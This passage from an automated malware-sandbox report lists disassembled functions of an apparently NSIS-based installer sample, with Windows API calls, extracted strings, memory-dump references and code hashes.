                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                            • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                            Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                            • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                            • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                            • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                            • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                            Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                            • String ID: F$N$open
                                                                                                                                                                                                                                                                                            • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                            • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                            • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                            Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                            • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                            • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                            • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                            • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                            • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                            • String ID: F
                                                                                                                                                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                            • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                            • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                            Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                            • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                            • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                            • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                            • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                            • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                            • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                            • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                            • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                            • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                            Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                            • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                            • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                            • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                            • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                            Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
